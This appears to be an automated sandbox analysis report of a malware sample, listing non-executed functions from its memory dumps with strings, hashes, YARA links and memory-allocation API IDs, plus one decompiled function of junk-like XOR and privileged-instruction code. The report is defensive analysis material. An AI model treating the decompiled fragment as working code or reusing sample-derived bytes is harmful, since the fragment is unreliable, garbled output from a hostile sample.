Opcode Fuzzy Hash: c63098b74f522311e15a6d2d05c7adb2c1a268459ecf32030be2b505bb356bdb
Instruction Fuzzy Hash: 14E02630494308DFCB628F30C8DA5E4BB60EF21300F424A8DE1D847552C3B001D8C712

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 020F2CF2, Relevance: 4.3, Strings: 3, Instructions: 599COMMON

Download Yara Rule

Strings

4BMf, xrefs: 020F3540
QJHW, xrefs: 020F325E
e^A`, xrefs: 020F2E24

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: 4BMf$QJHW$e^A`
API String ID: 0-2942027093
Opcode ID: 170487c57239942a267363e842cf4960f6625f73dbeeeb3717271e3781965852
Instruction ID: 085672bbe6c0a232d2d5030b85013cd95357f98d61280847893e621fa68cafff
Opcode Fuzzy Hash: 170487c57239942a267363e842cf4960f6625f73dbeeeb3717271e3781965852
Instruction Fuzzy Hash: 7C32BB71A407899FDBA4CF28CC90BDAB7E6FF49350F45422AED8D9B740D730A9418B91

Uniqueness

Uniqueness Score: -1.00%

Function 020F3FBC, Relevance: 2.6, Strings: 2, Instructions: 131COMMON

Download Yara Rule

Strings

[>~w, xrefs: 020F423E
}qS_, xrefs: 020F40C0

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: [>~w$}qS_
API String ID: 0-3193744725
Opcode ID: dfb77924cad080c19d3ea9e1014f208a976e1dcc60844a28091b91852a58d523
Instruction ID: b257935ffa6631bb943b3b315b1ddc891bf3ae77ef5935bf679f42f86822dad9
Opcode Fuzzy Hash: dfb77924cad080c19d3ea9e1014f208a976e1dcc60844a28091b91852a58d523
Instruction Fuzzy Hash: 0451D272645744DFCBF0CE6DC9C87DB76E2AB89714F94063ACE499BA08D331A681C705

Uniqueness

Uniqueness Score: -1.00%

Function 004046B4, Relevance: 2.6, Strings: 2, Instructions: 87COMMON

Download Yara Rule

Strings

s1'e, xrefs: 004046F5
!1?, xrefs: 00404704

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: !1?$s1'e
API String ID: 0-1457366028
Opcode ID: 1bfde712a96b70e943bb1292d4922f4a89030cadee9e4e033252cbd36cb3d145
Instruction ID: 9c494207e074087742ac3251cd371b187106aae4e611f7481fe9174598ab8a66
Opcode Fuzzy Hash: 1bfde712a96b70e943bb1292d4922f4a89030cadee9e4e033252cbd36cb3d145
Instruction Fuzzy Hash: E3219D319493959FC36A8E35C44359ABFB5FF477147A450AEE482CA9B2C62A1483CB81

Uniqueness

Uniqueness Score: -1.00%

Function 020F2EA2, Relevance: 1.5, Strings: 1, Instructions: 298COMMON

Download Yara Rule

Strings

QJHW, xrefs: 020F325E

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: QJHW
API String ID: 0-3797401239
Opcode ID: 85554357a3ddaf1cae18ea7b6d0e36cd7a01d9847469eb5ecbde0151bc8e2590
Instruction ID: d1020608435514a518b8d1aa775f931ae7ec65d891f9e22be4a266df5226776e
Opcode Fuzzy Hash: 85554357a3ddaf1cae18ea7b6d0e36cd7a01d9847469eb5ecbde0151bc8e2590
Instruction Fuzzy Hash: 26C1CF716443899FDBB4CF28CD90BDAB7E6FF49310F04422AEC99CB650D730AA518B91

Uniqueness

Uniqueness Score: -1.00%

Function 020F154C, Relevance: 1.5, Strings: 1, Instructions: 291COMMON

Download Yara Rule

Strings

}c$, xrefs: 020F1655

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: }c$
API String ID: 0-94709440
Opcode ID: c167b815e5900c9b2ae98964c8da934c43adc29855446b69a6a2808f16a4fe8c
Instruction ID: 20949c153f2e52ed0044eabb3195ad05292c0ac4c2541522481517d2ac64c908
Opcode Fuzzy Hash: c167b815e5900c9b2ae98964c8da934c43adc29855446b69a6a2808f16a4fe8c
Instruction Fuzzy Hash: CCA17D716853458FCB719E7C8CA53CE73E2AF58200F54403EDD888BA96E771994ADB83

Uniqueness

Uniqueness Score: -1.00%

Function 020F87FA, Relevance: 1.5, Strings: 1, Instructions: 266COMMON

Download Yara Rule

Strings

haB, xrefs: 020F8923

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: haB
API String ID: 0-1571895760
Opcode ID: 305b0721f6439de65438f936ea3d9d4bb56ca6f08265dc0286fc2436b40a3a3e
Instruction ID: 0681b55a67e28244926aaafe02e28dda9de9d38b543fa95693ed0e9b3f7438dd
Opcode Fuzzy Hash: 305b0721f6439de65438f936ea3d9d4bb56ca6f08265dc0286fc2436b40a3a3e
Instruction Fuzzy Hash: 42A117712853958FCB728E3C8CE93CA77E2AB45210F94816ACD88CF296D770950AC756

Uniqueness

Uniqueness Score: -1.00%

Function 020F7F34, Relevance: 1.5, Strings: 1, Instructions: 262COMMON

Download Yara Rule

Strings

Hs1, xrefs: 020F82C4

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: Hs1
API String ID: 0-1767169
Opcode ID: 87f617b86b171444e66c05e884a31d4221a0aeb6a27a65591f2e71f6dd2ec8ce
Instruction ID: 256d1d3499d323869c53ba067e45b0489add7f35f1998cd3aa672fdf345b2786
Opcode Fuzzy Hash: 87f617b86b171444e66c05e884a31d4221a0aeb6a27a65591f2e71f6dd2ec8ce
Instruction Fuzzy Hash: 39A15572A4475A8FDBB4CE38CDD47EA77E2EF89340F54412ACD899B604D7309A44CB52

Uniqueness

Uniqueness Score: -1.00%

Function 020F14C6, Relevance: 1.5, Strings: 1, Instructions: 224COMMON

Download Yara Rule

Strings

}c$, xrefs: 020F1655

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: }c$
API String ID: 0-94709440
Opcode ID: 3c303b0e79105ec7edb2c43252c4f01d8a4a643f0635a9d98aac3d6579cccdd8
Instruction ID: 9354be188f0381242c1731ee6a5e95ec5137a888bf3327f94303e2c1bdc2fdc6
Opcode Fuzzy Hash: 3c303b0e79105ec7edb2c43252c4f01d8a4a643f0635a9d98aac3d6579cccdd8
Instruction Fuzzy Hash: 04915676A44349DFCBB19F38C8487EA77F2AF64350F49812DDD898BA95D3318980DB42

Uniqueness

Uniqueness Score: -1.00%

Function 004035B2, Relevance: 1.4, Strings: 1, Instructions: 113COMMON

Download Yara Rule

Strings

1mFL, xrefs: 004035F6

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 1mFL
API String ID: 0-4036361619
Opcode ID: 3fee7e1417d5a5453e60d53df67511880af279f6922a7d35db0e668b59405452
Instruction ID: e51328b0f0d8b43e8df43ba3a5afa18cdcbf047131ab8d00f5ccb5d17461f863
Opcode Fuzzy Hash: 3fee7e1417d5a5453e60d53df67511880af279f6922a7d35db0e668b59405452
Instruction Fuzzy Hash: A531DA31E15324CBD76ECE788443147BFB4AF42A41BA095BED942CBA74CB765812DBC1

Uniqueness

Uniqueness Score: -1.00%

Function 020F7AD9, Relevance: 1.3, Strings: 1, Instructions: 88COMMON

Download Yara Rule

Strings

`, xrefs: 020F7BAF

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID: `
API String ID: 0-1850852036
Opcode ID: 65a770cdf85431aaa38e4dc250f29c7a7f536ad2a89b3c29f45683021592ecf1
Instruction ID: 66e83c66693ccc8eb7be2bd07ddbf9e50efdbc52e8619b7d02e2545ed451e853
Opcode Fuzzy Hash: 65a770cdf85431aaa38e4dc250f29c7a7f536ad2a89b3c29f45683021592ecf1
Instruction Fuzzy Hash: 10313772A443458BDFB8DE3DCCA83DA72E36B94310F56406FCC0ADB754DA308A818B52

Uniqueness

Uniqueness Score: -1.00%

Function 020F7EE6, Relevance: .4, Instructions: 365COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3013fbe6811292e89679594d3e7ac00e73ac5e7fce7e4bb25b9f5ee5ba9707fc
Instruction ID: fe4b33bc563ba9597028e0160902afc258980b30df07614f288845d5412b0db3
Opcode Fuzzy Hash: 3013fbe6811292e89679594d3e7ac00e73ac5e7fce7e4bb25b9f5ee5ba9707fc
Instruction Fuzzy Hash: BCC19B61989BCA5FC767CB308895799BFA0BE4322071886EFD6C14F8E7E3655041D7C1

Uniqueness

Uniqueness Score: -1.00%

Function 020F5D5D, Relevance: .3, Instructions: 256COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bd919b17398edc05776679124fc3797e3626da9d0c5d854a27386986d7ed3d6
Instruction ID: 0d6c97c58afceb5c37c5a03f78731dc66be2d6916fc96fd5f46750f9e757d250
Opcode Fuzzy Hash: 7bd919b17398edc05776679124fc3797e3626da9d0c5d854a27386986d7ed3d6
Instruction Fuzzy Hash: 79A105703853568FCB758E2D8CA17DE73E2BF44600F50452EDD89CB691E7709A4ACB46

Uniqueness

Uniqueness Score: -1.00%

Function 020F808E, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ee4e82fb92b3b9b3e381aa79e011c230e0aeec61d585fcefdf23aed04b2d078f
Instruction ID: 291b9695bd9ef0bc62a2797d8604b5688bb6ff088c2f87629242bc8cd40effce
Opcode Fuzzy Hash: ee4e82fb92b3b9b3e381aa79e011c230e0aeec61d585fcefdf23aed04b2d078f
Instruction Fuzzy Hash: 287114717817268FDB718D6D4CE53CA73E2AB48600F90403ADD48CB646E7B4AE4EC682

Uniqueness

Uniqueness Score: -1.00%

Function 00404478, Relevance: .2, Instructions: 215
COMMONCrypto

Download Yara Rule

C-Code - Quality: 56%

			E00404478() {
				signed char _t95;
				signed int _t96;
				signed int _t99;
				signed int _t100;
				signed int _t104;
				signed int _t105;
				void* _t106;
				signed int _t108;
				signed int _t110;
				void* _t111;
				signed int _t112;
				signed int _t113;
				signed int* _t114;
				signed int _t115;
				signed int _t116;
				void* _t117;
				signed int _t118;
				signed int _t120;
				void* _t121;
				signed int _t123;
				signed int _t125;
				void* _t127;
				signed int _t129;
				signed int _t130;
				signed int _t131;
				signed int _t135;
				signed int _t136;
				void* _t138;
				void* _t139;
				signed int _t140;
				signed int _t141;

				L0:
				while(1) {
					L0:
					_t96 = _t95 & 0x00000085;
					 *(_t127 - 0x63ce7c1f) =  *(_t127 - 0x63ce7c1f) ^ _t104;
					 *((char*)(_t108 - 0x600564cf)) =  *((char*)(_t108 - 0x600564cf)) + 1;
					 *(_t117 - 0x4dce6e0e) =  *(_t117 - 0x4dce6e0e) ^ _t136;
					_t7 = _t96 - 0x4d7ab2cf;
					_t105 =  *_t7;
					 *_t7 = _t104;
					 *(_t96 - 0x7d) =  *(_t96 - 0x7d) ^ _t108;
					 *(_t136 - 0x62) =  *(_t136 - 0x62) ^ _t96;
					_t118 = _t117 - 1;
					 *(_t108 - 0x64) =  *(_t108 - 0x64) ^ _t96;
					_t129 = _t127 - 1 + 1;
					 *(_t136 - 0x66) =  *(_t136 - 0x66) ^ _t105;
					 *(_t108 - 0x67) =  *(_t108 - 0x67) ^ _t105;
					 *(_t136 + 1 - 0x69) =  *(_t136 + 1 - 0x69) ^ _t118;
					_pop(_t138);
					 *(_t108 + 1 - 0x6b) =  *(_t108 + 1 - 0x6b) ^ _t118;
					_pop(_t110);
					 *_t110 =  *_t110 ^ _t96;
					 *_t129 =  *_t129 ^ _t140;
					if( *_t129 >= 0) {
						break;
					}
					L2:
					 *_t123 =  *_t123 ^ _t123;
					_t138 = _t138 +  *_t105;
					 *(_t96 + _t123 * 2) =  *(_t96 + _t123 * 2) ^ _t140;
					_t96 = _t96 - 0x31;
					_t129 = _t129 + 1;
					 *_t110 =  *_t110 + _t129;
					if( *_t110 > 0) {
						L1:
						continue;
					}
					L3:
					 *(_t129 - 0x64) =  *(_t129 - 0x64) ^ 0x00000071;
					break;
				}
				L4:
				 *(_t96 - 0xf) =  *(_t96 - 0xf) ^ _t110;
				_t139 = _t140;
				 *(_t123 + _t123 * 8 - 0x1741cebe) =  *(_t123 + _t123 * 8 - 0x1741cebe) ^ _t129;
				 *(_t110 + 0xffffffffeda034d0) =  *(_t110 + 0xffffffffeda034d0) ^ _t140;
				_t125 = _t123 + 2;
				 *(_t110 - 0x4ecebf1a) =  *(_t110 - 0x4ecebf1a) ^ _t125;
				asm("loope 0x5f");
				 *(_t96 - 8) =  *(_t96 - 8) ^ _t110;
				_pop(_t111);
				 *(_t105 - 0xe) =  *(_t105 - 0xe) ^ _t96;
				 *(_t96 + 0x63 + _t125 * 4) =  *(_t96 + 0x63 + _t125 * 4) ^ _t125;
				 *_t96 =  *_t96 ^ _t105;
				asm("sbb [eax+0x31], esp");
				_t106 = _t105 + 1;
				_t112 = _t96 + 1;
				 *0x71 =  *0x71 ^ _t112;
				_t113 = _t112 |  *(_t139 + 0x31);
				es = es;
				_t99 = _t111 - 1;
				 *_t129 =  *_t129 ^ _t99;
				es = 0x71;
				_t100 = _t99 - 1;
				 *_t100 =  *_t100 ^ _t113;
				_t57 = _t106 + 0x31;
				 *_t57 =  *(_t106 + 0x31) | _t113;
				if( *_t57 >= 0) {
					 *[es:edx] =  *[es:edx] ^ _t140;
					_t130 = _t129 -  *_t113;
					asm("adc [edi+0x7], ecx");
					 *(_t139 - 0x58) =  *(_t139 - 0x58) ^ _t125;
					 *[gs:ebp-0x63] =  *[gs:ebp-0x63] ^ 0x00000071;
					_push(_t113);
					 *(_t125 + 0x59 + _t113 * 4) =  *(_t125 + 0x59 + _t113 * 4) ^ _t100;
					 *(_t106 - 0x45cea106) =  *(_t106 - 0x45cea106) ^ _t130;
					asm("out 0x42, eax");
					 *0xFFFFFFFFA031455F =  *0xFFFFFFFFA031455F ^ _t140;
					asm("out dx, eax");
					_t141 = _t140 + 1;
					 *0xFFFFFFFFB431415A =  *0xFFFFFFFFB431415A ^ _t125;
					asm("loop 0x5e");
					 *(_t125 - 4) =  *(_t125 - 4) ^ _t113;
					 *_t100 =  *_t100 ^ _t113;
					if( *_t100 >= 0) {
						_push(_t100);
						 *0x23311f47 =  *0x23311f47 ^ 0x00000071;
						_push(cs);
						_t131 = _t130 -  *_t113;
						_t120 = 0x00000071 &  *_t113;
						 *_t131 =  *_t131 ^ _t120;
						 *(_t120 - 0x55) =  *(_t120 - 0x55) ^ _t125;
						asm("pushad");
						 *0xFFFFFFFFFFFFFFA5 =  *0xFFFFFFFFFFFFFFA5 ^ _t120;
						asm("outsb");
						 *(_t120 - 0x74) =  *(_t120 - 0x74) ^ 0x00000008;
						 *(_t125 - 5) =  *(_t125 - 5) ^ _t113;
						_t121 = _t141;
						 *(_t131 - 0x5ecea11e) =  *(_t131 - 0x5ecea11e) ^ _t131;
						asm("in al, dx");
						 *(_t121 + 1 - 0x40cebb12) =  *(_t121 + 1 - 0x40cebb12) ^ _t141;
						while(1) {
							asm("out dx, al");
							asm("sti");
							_t113 = _t113 ^ _t131;
							asm("into");
							asm("into");
							asm("into");
							 *_t113 =  *_t113 ^ _t131;
							 *_t113 =  *_t113 ^ _t131;
							asm("stc");
						}
					}
					 *0x000000D4 =  *0x000000D4 ^ _t141;
					 *(_t130 - 1 + 0x67) =  *(_t130 - 1 + 0x67) ^ _t141;
					 *(_t100 + 0x5043149) =  *(_t100 + 0x5043149) ^ _t100;
					_t114 = _t113 - 1;
					 *0x49050431 =  *0x49050431 ^ _t100;
					_pop(es);
					 *(_t100 - 1 + 0x71) =  *(_t100 - 1 + 0x71) ^ 0x49050431;
					 *_t114 =  *_t114 ^ 0x49050431;
					 *_t114 =  *_t114 ^ 0x49050431;
					asm("into");
					asm("into");
					_t115 = 0x49050431;
					asm("into");
					asm("into");
					asm("jecxz 0xffffffd0");
					asm("into");
					asm("into");
					asm("fcmovne st0, st6");
					asm("into");
					asm("into");
					asm("into");
					asm("into");
					L9:
					asm("into");
					asm("into");
					asm("into");
					 *_t115 =  *_t115 ^ 0x49050431;
					 *_t115 =  *_t115 ^ 0x49050431;
					asm("stc");
					asm("out dx, al");
					asm("cli");
					_t115 = _t115 ^ 0x49050431;
					goto L9;
				}
				 *_t113 =  *_t113 ^ _t129;
				 *_t113 =  *_t113 ^ _t129;
				_t135 = _t129 ^ _t113;
				asm("into");
				asm("into");
				_t116 = _t135;
				asm("into");
				asm("into");
				asm("jecxz 0xffffffd0");
				asm("into");
				asm("into");
				asm("fcmovne st0, st6");
				asm("into");
				asm("into");
				asm("into");
				asm("into");
				L6:
				asm("into");
				asm("into");
				asm("into");
				 *_t116 =  *_t116 ^ _t135;
				 *_t116 =  *_t116 ^ _t135;
				asm("stc");
				asm("out dx, al");
				asm("cli");
				_t116 = _t116 ^ _t135;
				goto L6;
			}

0x00404478
0x00404478
0x00404478
0x00404478
0x0040447b
0x00404481
0x00404487
0x0040448d
0x0040448d
0x0040448d
0x00404493
0x00404497
0x0040449a
0x0040449b
0x0040449e
0x0040449f
0x004044a3
0x004044a7
0x004044aa
0x004044ab
0x004044ae
0x004044af
0x004044b3
0x004044b5
0x00000000
0x00000000
0x004044b7
0x004044b7
0x004044b9
0x004044bb
0x004044be
0x004044c0
0x004044c2
0x004044c4
0x00404471
0x00000000
0x00404471
0x004044c6
0x004044c6
0x00000000
0x004044c6
0x004044ca
0x004044cb
0x004044ce
0x004044cf
0x004044d7
0x004044de
0x004044df
0x004044e5
0x004044e7
0x004044ea
0x004044eb
0x004044ef
0x004044f3
0x004044f5
0x004044f8
0x004044fa
0x004044fb
0x004044fd
0x00404501
0x00404502
0x00404503
0x00404505
0x00404506
0x00404507
0x00404509
0x00404509
0x0040450c
0x0040457e
0x00404582
0x00404584
0x00404587
0x0040458a
0x0040458e
0x0040458f
0x00404593
0x00404599
0x0040459b
0x004045a1
0x004045a2
0x004045a3
0x004045a9
0x004045ab
0x004045af
0x004045b1
0x00404632
0x00404633
0x00404639
0x0040463a
0x0040463e
0x00404647
0x0040464b
0x0040464e
0x0040464f
0x00404652
0x00404653
0x00404657
0x0040465a
0x0040465b
0x00404661
0x00404663
0x004046ad
0x004046ad
0x004046ae
0x004046af
0x004046a5
0x004046a6
0x004046a7
0x004046a8
0x004046aa
0x004046ac
0x004046ac
0x004046ad
0x004045b3
0x004045b7
0x004045bf
0x004045c6
0x004045c7
0x004045c9
0x004045cb
0x004045cf
0x004045d1
0x004045d5
0x004045d6
0x004045d7
0x004045d9
0x004045da
0x004045db
0x004045dd
0x004045de
0x004045df
0x004045e1
0x004045e2
0x004045e3
0x004045e4
0x004045e5
0x004045e5
0x004045e6
0x004045e7
0x004045e8
0x004045ea
0x004045ec
0x004045ed
0x004045ee
0x004045ef
0x00000000
0x004045ef
0x0040450f
0x00404511
0x00404513
0x00404515
0x00404516
0x00404517
0x00404519
0x0040451a
0x0040451b
0x0040451d
0x0040451e
0x0040451f
0x00404521
0x00404522
0x00404523
0x00404524
0x00404525
0x00404525
0x00404526
0x00404527
0x00404528
0x0040452a
0x0040452c
0x0040452d
0x0040452e
0x0040452f
0x00000000

Memory Dump Source

Source File: 00000001.00000002.862338793.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.862327620.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.862365683.0000000000415000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.862372500.0000000000417000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f65299eca22b9a82dff30c83b80ecc6ba9fb1558f2ee11b3c0650a2d90bd0a1
Instruction ID: c77f8f89eeb79534b6064d62ed68bbe023f511f221c89346013e17e9c9d46e12
Opcode Fuzzy Hash: 9f65299eca22b9a82dff30c83b80ecc6ba9fb1558f2ee11b3c0650a2d90bd0a1
Instruction Fuzzy Hash: FE712E76808266DFD31DCE31804756ABBB1FF82708B6194AED583CA8B1D7362842DF84

Uniqueness

Uniqueness Score: -1.00%

Function 020F5D10, Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 75eb529167e22c32bc751f21f7f57aa0e05bae9cc5eea2a5cfa0e4f6233381d7
Instruction ID: 98194885a98b2acea2c053eaa80cbfe645a903df7879eb445b11c288b6a131f0
Opcode Fuzzy Hash: 75eb529167e22c32bc751f21f7f57aa0e05bae9cc5eea2a5cfa0e4f6233381d7
Instruction Fuzzy Hash: F391DF7124438A9FDBB89F28CC90BEF7BA6BF44340F41852DDD8A9B650D7318A81DB15

Uniqueness

Uniqueness Score: -1.00%

Function 020F9E67, Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e8d2767dcfde3e63c4880739f94a09bff7ca4e55e23a387b1fda0f4de9571f80
Instruction ID: 1436b0084cdf71e385b09f1acdc835111e19eeb2f74c83c9ed5abc0fabc4afa4
Opcode Fuzzy Hash: e8d2767dcfde3e63c4880739f94a09bff7ca4e55e23a387b1fda0f4de9571f80
Instruction Fuzzy Hash: 2C51BD31A86BCB5FDB978F748882759BF90BD8731031946EFD6C14B896D3212096DAC0

Uniqueness

Uniqueness Score: -1.00%

Function 020F8C67, Relevance: .2, Instructions: 161COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8d54ec06db98f5121c9a6ccfd1b4d6436e1d02a69a404d7f14f7a3c9c0acabcf
Instruction ID: 1483b81fd4c01f1522531a0a92d243ceaeb74e711c7ff4d987a6164e079b0633
Opcode Fuzzy Hash: 8d54ec06db98f5121c9a6ccfd1b4d6436e1d02a69a404d7f14f7a3c9c0acabcf
Instruction Fuzzy Hash: 5A51F8247C53664FCB328D6D08B53CDB3D26B94510FD4803ACDC4CB69BD7A0994F8286

Uniqueness

Uniqueness Score: -1.00%

Function 020F20C0, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: 48da80f1a9212914221b58dcac9eda58cd2439f0cc1aa0913e75d6e5e61fbb00
Instruction ID: 489af350a8bbb0dc905d3212c5085df6c372ca8f29c610d8cf2dd13de92487dc
Opcode Fuzzy Hash: 48da80f1a9212914221b58dcac9eda58cd2439f0cc1aa0913e75d6e5e61fbb00
Instruction Fuzzy Hash: C34186726053849FD7A0AE398C446CEBBE3EF85310F5A451DD98997A21D7708986CB82

Uniqueness

Uniqueness Score: -1.00%

Function 020F3C48, Relevance: .1, Instructions: 141COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53f9bd77e0a6e9a955be5b1f6648dd74f9d5815262c25bd5b7447fa5c3969aea
Instruction ID: d24d5b2e7ba1cfb9d25c61fea46251a60df829123f808c85904602efbdc8f959
Opcode Fuzzy Hash: 53f9bd77e0a6e9a955be5b1f6648dd74f9d5815262c25bd5b7447fa5c3969aea
Instruction Fuzzy Hash: A35112B25043149FC768DF34CA98BDA7BB1FF18364F524299D94ACB261C3709985CF81

Uniqueness

Uniqueness Score: -1.00%

Function 020F1D68, Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1da446d63c0bed132502653a9eee706f8fbf3a576b1a4d9125308b1ace72cff7
Instruction ID: a3b92779df5199316c02214c4d4fb35a51ec2b19f8e5a3d4b45b17c77b924404
Opcode Fuzzy Hash: 1da446d63c0bed132502653a9eee706f8fbf3a576b1a4d9125308b1ace72cff7
Instruction Fuzzy Hash: 88519C71A453889BDF74DE25CC94BDE7BA2EF98340F81812EEC8E9B250D7315A81CB15

Uniqueness

Uniqueness Score: -1.00%

Function 020F1D73, Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c397070440e4808c17d85ff7c332e0259cd275e35519ce53bf5fe84c654c0cc
Instruction ID: 37d6177e65faece7bf9b6fe2730023898d919a79894b13e1b10d106ad62a0059
Opcode Fuzzy Hash: 1c397070440e4808c17d85ff7c332e0259cd275e35519ce53bf5fe84c654c0cc
Instruction Fuzzy Hash: 8051AEB1A452989BDF74DE25CC94BDE7BA2EF98340F41812EEC8E9B250D3315A81CB15

Uniqueness

Uniqueness Score: -1.00%

Function 020F20FE, Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6a3b15770a8ca2c3a61d2af5739056b6e31c0bf52ca5e641a19548359d6841b
Instruction ID: db9839017d3200d75f3aa901ac07d5113b6ba064e800d826c24a6275ab60b7ab
Opcode Fuzzy Hash: f6a3b15770a8ca2c3a61d2af5739056b6e31c0bf52ca5e641a19548359d6841b
Instruction Fuzzy Hash: 084189715053809FD7A1AE3D8C852CEBBE2EFD5700F9A451DCC8597A15DB34C986CB82

Uniqueness

Uniqueness Score: -1.00%

Function 020F249F, Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: ffc76f934875bc779eb90de0f7329f73a55d09b035e0615219cf5e303cef9555
Instruction ID: 37a01744e0617953faa91dc9a6d115dfb76b783dba2f82e94eff53bc33fa10d2
Opcode Fuzzy Hash: ffc76f934875bc779eb90de0f7329f73a55d09b035e0615219cf5e303cef9555
Instruction Fuzzy Hash: 1841B1B2A002998FDF709F68CD497CB3BB6AF68710F594125DD98EB604D7349A81CB90

Uniqueness

Uniqueness Score: -1.00%

Function 020F3912, Relevance: .1, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abc8bf378b7a668ec7c20c8daa76a50dc73786aa14fcb581f125cf68ec037445
Instruction ID: 88e508a1fe27a69d96e49545da8d281ee7083664818c515ea5e28aeeffa17882
Opcode Fuzzy Hash: abc8bf378b7a668ec7c20c8daa76a50dc73786aa14fcb581f125cf68ec037445
Instruction Fuzzy Hash: 10412232588388DFDBB1AF74C8887EAB7A2EF44360F56055DDE858B621D7308581DE62

Uniqueness

Uniqueness Score: -1.00%

Function 020F89FD, Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.862709235.00000000020F0000.00000040.00000001.sdmp, Offset: 020F0000, based on PE: false

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 074152d271051f5343a5f83954d8e6cdb0e431fbaead42566aab42d48bde2870
Instruction ID: 34b30942e4a86d3380df8f32b1fba75e653787208861c22c8945962426abeb53
Opcode Fuzzy Hash: 074152d271051f5343a5f83954d8e6cdb0e431fbaead42566aab42d48bde2870
Instruction Fuzzy Hash: 4741C2715483C48ADFB6CF348C987DABBA2EF45310F89819EC98D8F685C3754241CB26

